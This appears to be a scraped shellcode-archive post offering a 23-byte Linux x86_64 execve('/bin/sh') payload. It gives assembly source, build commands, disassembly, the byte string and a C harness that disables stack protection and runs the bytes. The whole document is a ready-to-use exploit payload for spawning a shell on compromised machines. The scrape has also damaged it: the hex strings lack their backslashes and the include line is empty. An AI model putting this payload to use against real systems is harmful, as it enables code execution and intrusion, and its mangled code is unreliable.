Linux/x64 – Execve(/bin/sh) Shellcode (23 bytes)

/*
;Category: Shellcode
;Title: GNU/Linux x86_64 - execve /bin/sh
;Author: rajvardhan
;Date: 23/05/2019
;Architecture: Linux x86_64
;Possibly The Smallest And Fully Reliable Shellcode

===========
Asm Source  
===========

global _start
section .text
_start:
	xor rsi,rsi
	push rsi
	mov rdi,0x68732f2f6e69622f
	push rdi
	push rsp
	pop rdi
	push 59
	pop rax
	cdq
	syscall
================================
Instruction for nasm compliation
================================

nasm -f elf64 shellcode.asm -o shellcode.o
ld shellcode.o -o shellcode

===================
objdump disassembly
===================

Disassembly of section .text:

0000000000401000 :
  401000:	48 31 f6             	xor    %rsi,%rsi
  401003:	56                   	push   %rsi
  401004:	48 bf 2f 62 69 6e 2f 	movabs $0x68732f2f6e69622f,%rdi
  40100b:	2f 73 68 
  40100e:	57                   	push   %rdi
  40100f:	54                   	push   %rsp
  401010:	5f                   	pop    %rdi
  401011:	6a 3b                	pushq  $0x3b
  401013:	58                   	pop    %rax
  401014:	99                   	cltd   
  401015:	0f 05                	syscall 

==================
23 Bytes Shellcode
==================

x48x31xf6x56x48xbfx2fx62x69x6ex2fx2fx73x68x57x54x5fx6ax3bx58x99x0fx05

======================
C Compilation And Test
======================

gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

*/

#include 

unsigned char shellcode[] = 
"x48x31xf6x56x48xbfx2fx62x69x6ex2fx2fx73x68x57x54x5fx6ax3bx58x99x0fx05";
int main()
{
    int (*ret)() = (int(*)())shellcode;
    ret();
}
            

Comments are closed.